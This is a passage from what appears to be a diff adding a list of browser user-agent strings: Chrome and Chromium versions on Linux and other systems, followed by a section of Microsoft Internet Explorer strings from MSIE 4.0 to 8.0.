Chrome/4.0.223.1 Safari/532.2 +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.2 Safari/532.2 +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8 +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.358.0 Safari/533.3 +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.366.2 Safari/533.4 +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.551.0 Safari/534.10 +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.12 (KHTML, like Gecko) Chrome/9.0.579.0 Safari/534.12 +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.44 Safari/534.13 +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/9.10 Chromium/9.0.592.0 Chrome/9.0.592.0 Safari/534.13 +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.612.1 Safari/534.15 +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.04 Chromium/10.0.612.3 Chrome/10.0.612.3 Safari/534.15 +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.611.0 Chrome/10.0.611.0 Safari/534.15 +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15 +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.134 Safari/534.16 +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.0 Chrome/10.0.648.0 Safari/534.16 +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.133 Chrome/10.0.648.133 Safari/534.16 +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.416.0 Safari/534.1 +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.1 SUSE/6.0.428.0 (KHTML, like Gecko) Chrome/6.0.428.0 Safari/534.1 +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/6.0.453.1 Safari/534.2 +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.457.0 Safari/534.3 +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.0 Safari/534.3 +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.460.0 Safari/534.3 +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.462.0 Safari/534.3 +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.24 Safari/534.7 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/530.7 (KHTML, like Gecko) Chrome/2.0.175.0 Safari/530.7 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.196.0 Safari/532.0 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.197.0 Safari/532.0 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198.0 Safari/532.0 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198.1 Safari/532.0 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.2 Safari/532.0 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/534.12 (KHTML, like Gecko) Chrome/9.0.576.0 Safari/534.12 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.634.0 Safari/534.16 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.24 Safari/532.0 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.2 Safari/532.0 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.204.0 Safari/532.0 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.0 Safari/532.0 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.208.0 Safari/532.0 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.209.0 Safari/532.0 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.0 Safari/532.0 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.212.0 Safari/532.0 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.0 Safari/532.1 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.1 Safari/532.1 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.3 Safari/532.1 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.3 Safari/532.2 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.7 Safari/532.2 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.1 Safari/532.2 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.4 Safari/532.2 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.5 Safari/532.2 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.6 Safari/532.2 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.2 Safari/532.2 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.308.0 Safari/532.9 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Chrome/5.0.335.0 Safari/533.1 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.3 Safari/533.2 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.353.0 Safari/533.3 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.354.0 Safari/533.3 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.358.0 Safari/533.3 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.368.0 Safari/533.4 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.544.0 Safari/534.10 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.200 Safari/534.10 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Ubuntu/10.10 Chromium/8.0.552.237 Chrome/8.0.552.237 Safari/534.10 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 v1333515017.9196 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 v1416664997.4379 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 v1416670950.695 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 v1416748405.3871 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 v1416758524.9051 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/10.04 Chromium/9.0.595.0 Chrome/9.0.595.0 Safari/534.13 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Ubuntu/10.10 Chromium/9.0.600.0 Chrome/9.0.600.0 Safari/534.14 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.11 Safari/534.16 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.82 Safari/534.16 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.642.0 Chrome/10.0.642.0 Safari/534.16 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.0 Chrome/10.0.648.0 Safari/534.16 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.127 Chrome/10.0.648.127 Safari/534.16 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.133 Chrome/10.0.648.133 Safari/534.16 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 SUSE/10.0.626.0 (KHTML, like Gecko) Chrome/10.0.626.0 Safari/534.16 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.417.0 Safari/534.1 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.427.0 Safari/534.1 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.1 Safari/534.3 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.470.0 Safari/534.3 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML,like Gecko) Chrome/9.1.0.0 Safari/540.0 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/8.1.0.0 Safari/540.0 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.15) Gecko/20101027 Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.540.0 Safari/534.10 +Mozilla/5.0 (X11; U; Linux x86_64; fr-FR) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7 +Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3 +Mozilla/5.0 (X11; U; Slackware Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.30 Safari/532.5 +Mozilla/5.0 (X11; U; Windows NT 6; en-US) AppleWebKit/534.12 (KHTML, like Gecko) Chrome/9.0.587.0 Safari/534.12 +Mozilla/5.0 (X11; U; x86_64 Linux; en_GB, en_US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.358.0 Safari/533.3 +Mozilla/6.0 (Windows; U; Windows NT 6.0; en-US) Gecko/2009032609 Chrome/2.0.172.6 Safari/530.7 +Mozilla/6.0 (Windows; U; Windows NT 6.0; en-US) Gecko/2009032609 (KHTML, like Gecko) Chrome/2.0.172.6 Safari/530.7 +Mozilla/6.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0 + +# Microsoft Internet Explorer + +Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0) +Mozilla/4.0 (Compatible; MSIE 4.0) +Mozilla/4.0 (compatible; MSIE 4.01; Mac_PowerPC) +Mozilla/4.0 (compatible; MSIE 4.01; Windows 95) +Mozilla/4.0 (compatible; MSIE 4.01; Windows 98) +Mozilla/4.0 (compatible; MSIE 4.01; Windows 98; DigExt) +Mozilla/4.0 (compatible; MSIE 4.01; Windows 98; Hotbar 3.0) +Mozilla/4.0 (compatible; MSIE 4.01; Windows CE) +Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC) +Mozilla/4.0 (compatible; MSIE 4.01; Windows NT) +Mozilla/4.0 (compatible; MSIE 4.01; Windows NT 5.0) +Mozilla/4.0 (compatible; MSIE 4.0; Windows 95) +Mozilla/4.0 (compatible; MSIE 4.0; Windows 95; .NET CLR 1.1.4322; .NET CLR 2.0.50727) +Mozilla/4.0 (compatible; MSIE 4.0; Windows 98) +Mozilla/4.0 (compatible; MSIE 4.0; Windows NT) +Mozilla/4.0 (compatible; MSIE 4.5; Mac_PowerPC) +Mozilla/4.0 (compatible; MSIE 4.5; Windows 98;) +Mozilla/4.0 (compatible; MSIE 4.5; Windows NT 5.1; .NET CLR 2.0.40607) +Mozilla/4.0 (compatible; MSIE 5.00; Windows 98) +Mozilla/4.0 (compatible; MSIE 5.01; Windows NT) +Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MSIECrawler) +Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; Q312461) +Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; Q312461; T312461) +Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; SV1) +Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; SV1; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727) +Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; Wanadoo 5.1) +Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; Wanadoo 5.3; Wanadoo 5.5) +Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; Wanadoo 5.6) +Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; YComp 5.0.0.0) +Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; YComp 5.0.0.0; Hotbar 4.1.8.0) +Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; YComp 5.0.2.4) +Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; YComp 5.0.2.6) +Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; YComp 5.0.2.6; Hotbar 3.0) +Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; YComp 5.0.2.6; Hotbar 4.2.8.0) +Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; YComp 5.0.2.6; MSIECrawler) +Mozilla/4.0 (compatible; MSIE 5.01; Windows NT; DigExt) +Mozilla/4.0 (compatible; MSIE 5.01; Windows NT; Hotbar 4.1.8.0) +Mozilla/4.0 (compatible; MSIE 5.01; Windows NT; .NET CLR 1.0.3705) +Mozilla/4.0 (compatible; MSIE 5.01; Windows NT; YComp 5.0.0.0) +Mozilla/4.0 (compatible; MSIE 5.05; Windows 98; .NET CLR 1.1.4322) +Mozilla/4.0 (compatible; MSIE 5.05; Windows NT 3.51) +Mozilla/4.0 (compatible; MSIE 5.05; Windows NT 4.0) +Mozilla/4.0 (compatible; MSIE 5.0b1; Mac_PowerPC) +Mozilla/4.0 (compatible; MSIE 5.0; Windows 98;) +Mozilla/4.0(compatible; MSIE 5.0; Windows 98; DigExt) +Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt; YComp 5.0.2.6) +Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt; YComp 5.0.2.6; yplus 1.0) +Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; Hotbar 3.0) +Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; YComp 5.0.2.4) +Mozilla/4.0 (compatible; MSIE 5.0; Windows NT;) +Mozilla/4.0 (compatible; MSIE 5.0; Windows NT) +Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.0) +Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.2; .NET CLR 1.1.4322) +Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.9; .NET CLR 1.1.4322) +Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 6.0; Trident/4.0; InfoPath.1; SV1; .NET CLR 3.0.04506.648; .NET4.0C; .NET4.0E) +Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt) +Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; Hotbar 3.0) +Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; Hotbar 4.1.8.0) +Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; .NET CLR 1.0.3705) +Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; YComp 5.0.0.0) +Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; YComp 5.0.2.5) +Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; YComp 5.0.2.6) +Mozilla/4.0 (compatible; MSIE 5.12; Mac_PowerPC) +Mozilla/4.0 (compatible; MSIE 5.13; Mac_PowerPC) +Mozilla/4.0 (compatible; MSIE 5.14; Mac_PowerPC) +Mozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC) +Mozilla/4.0 (compatible; MSIE 5.16; Mac_PowerPC) +Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC) +Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC Mac OS; en) +Mozilla/4.0 (compatible; MSIE 5.21; Mac_PowerPC) +Mozilla/4.0 (compatible; MSIE 5.22; Mac_PowerPC) +Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC) +Mozilla/4.0 (compatible; MSIE 5.2; Mac_PowerPC) +Mozilla/4.0 (compatible; MSIE 5.5;) +Mozilla/4.0 (compatible; MSIE 5.50; Windows 95; SiteKiosk 4.8) +Mozilla/4.0 (compatible; MSIE 5.50; Windows 98; SiteKiosk 4.8) +Mozilla/4.0 (compatible; MSIE 5.50; Windows NT; SiteKiosk 4.8) +Mozilla/4.0 (compatible; MSIE 5.50; Windows NT; SiteKiosk 4.8; SiteCoach 1.0) +Mozilla/4.0 (compatible; MSIE 5.50; Windows NT; SiteKiosk 4.9; SiteCoach 1.0) +Mozilla/4.0 (compatible; MSIE 5.5b1; Mac_PowerPC) +Mozilla/4.0 (compatible;MSIE 5.5; Windows 98) +Mozilla/4.0 (compatible; MSIE 5.5; Windows NT) +Mozilla/4.0 (compatible; MSIE 5.5; Windows NT5) +Mozilla/4.0 (Compatible; MSIE 5.5; Windows NT5.0; Q312461; SV1; .NET CLR 1.1.4322; InfoPath.2) +Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) +Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) +Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.2; .NET CLR 1.1.4322) +Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.2; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; FDM) +Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.5) +Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618) +Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 6.1; chromeframe/12.0.742.100; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C) +Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) +Mozilla/4.0 (compatible; MSIE 6.01; Windows NT 6.0) +Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98) +Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98; Win 9x 4.90) +Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98; YComp 5.0.0.0) +Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 4.0) +Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 4.0; .NET CLR 1.0.2914) +Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0) +Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.3705) +Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.1.4322) +Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; YComp 5.0.0.0) +Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; YComp 5.0.2.6) +Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) +Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1; DigExt) +Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) +Mozilla/4.0 (compatible;MSIE 6.0;Windows 98;Q312461) +Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) +Mozilla/4.0 (compatible; MSIE 6.1; Windows XP; .NET CLR 1.1.4322; .NET CLR 2.0.50727) +Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; FDM; .NET CLR 1.1.4322) +Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1) +Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.0.3705; Media Center PC 3.1; Alexa Toolbar; .NET CLR 1.1.4322; .NET CLR 2.0.50727) +Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322) +Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar) +Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727) +Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1) +Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727) +Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.40607) +Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727) +Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30) +Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) +Mozilla/4.0(compatible; MSIE 7.0b; Windows NT 6.0) +Mozilla/4.0 (compatible;MSIE 7.0;Windows NT 6.0) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; chromeframe/12.0.742.100) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; SLCC2; .NET CLR 2.0.50727; InfoPath.3; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; .NET4.0C; .NET4.0E; InfoPath.3) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/6.0; .NET4.0E; .NET4.0C) +Mozilla/4.0 (Compatible; MSIE 8.0; Windows NT 5.2; Trident/6.0) +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8 +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8) +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2) 